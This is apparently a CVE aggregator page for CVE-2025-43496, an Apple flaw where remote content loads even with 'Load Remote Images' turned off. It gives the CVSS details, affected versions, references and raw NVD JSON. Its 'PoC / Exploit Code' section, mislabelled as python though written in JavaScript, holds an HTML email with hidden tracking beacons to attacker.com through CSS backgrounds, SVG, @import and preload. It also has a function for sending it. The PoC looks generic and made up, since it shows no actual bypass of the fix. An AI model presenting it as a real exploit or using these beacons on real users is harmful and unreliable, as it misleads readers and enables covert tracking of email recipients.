CVE-2025-43496

Description

The issue was addressed by adding additional logic. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1, macOS Sequoia 15.7.2, macOS Tahoe 26.1, visionOS 26.1, watchOS 26.1. Remote content may be loaded even when the 'Load Remote Images' setting is turned off.

CVSS Details

CVSS Score

7.5

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:* - VULNERABLE

Apple iOS < 18.7.2

Apple iOS < 26.1

Apple iPadOS < 18.7.2

Apple iPadOS < 26.1

Apple macOS Sequoia < 15.7.2

Apple macOS Tahoe < 26.1

Apple visionOS < 26.1

Apple watchOS < 26.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

// CVE-2025-43496 PoC - Remote Image Loading Bypass
// This PoC demonstrates the concept of bypassing 'Load Remote Images' setting

// Malicious HTML email content that bypasses the image loading restriction
const maliciousEmailContent = `
<html>
<body>
  <!-- Method 1: Using CSS background-image -->
  <div style="width: 1px; height: 1px; 
    background-image: url('https://attacker.com/track?uid=12345&time=${Date.now()}'); 
    background-repeat: no-repeat;"></div>
  
  <!-- Method 2: Using SVG with external reference -->
  <svg xmlns="http://www.w3.org/2000/svg" width="1" height="1">
    <image href="https://attacker.com/track2?uid=12345"/>
  </svg>
  
  <!-- Method 3: Using CSS @import -->
  <style>
    @import url('https://attacker.com/track3?uid=12345');
  </style>
  
  <!-- Method 4: Using preload link -->
  <link rel="preload" href="https://attacker.com/track4?uid=12345" as="image">
</body>
</html>
`;

// Simulate sending the malicious email
function sendMaliciousEmail(targetEmail) {
  return {
    to: targetEmail,
    subject: 'Important: Please Review',
    html: maliciousEmailContent,
    timestamp: new Date().toISOString()
  };
}

// Attacker's tracking endpoint (simulated)
function createTrackingPixel() {
  return `<img src="https://attacker.com/pixel.gif?cve=2025-43496" style="display:none">`;
}

// Export for testing
module.exports = { sendMaliciousEmail, createTrackingPixel };

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-43496
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-43496
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-43496/
[4] VulDB https://vuldb.com/cve/CVE-2025-43496
[5] https://support.apple.com/en-us/125632
[6] https://support.apple.com/en-us/125633
[7] https://support.apple.com/en-us/125634
[8] https://support.apple.com/en-us/125635
[9] https://support.apple.com/en-us/125638
[10] https://support.apple.com/en-us/125639

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-43496", "sourceIdentifier": "[email protected]", "published": "2025-11-04T02:15:52.783", "lastModified": "2026-04-02T19:20:54.813", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "The issue was addressed by adding additional logic. This issue is fixed in iOS 18.7.2 and iPadOS 18.7.2, iOS 26.1 and iPadOS 26.1, macOS Sequoia 15.7.2, macOS Tahoe 26.1, visionOS 26.1, watchOS 26.1. Remote content may be loaded even when the 'Load Remote Images' setting is turned off."}, {"lang": "es", "value": "El problema se abordó añadiendo lógica adicional. Este problema se ha corregido en iOS 18.7.2 y iPadOS 18.7.2. El contenido remoto puede cargarse incluso cuando el ajuste 'Cargar imágenes remotas' está desactivado."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-359"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:apple:ipados:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "6D51AEDC-9086-4010-B3BF-C652D65D09C8"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:iphone_os:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "3981A7BE-BC98-4C6F-AE38-D68839368925"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:macos:*:*:*:*:*:*:*:*", "versionEndExcluding": "15.7.2", "matchCriteriaId": "DD6E8540-AC8B-40E0-945A-8D4C465E8471"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:visionos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "7DFD3616-65CA-4E5C-849C-3C20ACBCB610"}, {"vulnerable": true, "criteria": "cpe:2.3:o:apple:watchos:*:*:*:*:*:*:*:*", "versionEndExcluding": "26.1", "matchCriteriaId": "9F9D7F76-13FB-407C-94E5-221B93021568"}]}]}], "references": [{"url": "https://support.apple.com/en-us/125632", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125633", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125634", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125635", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125638", "source": "[email protected]"}, {"url": "https://support.apple.com/en-us/125639", "source": "[email protected]"}]}}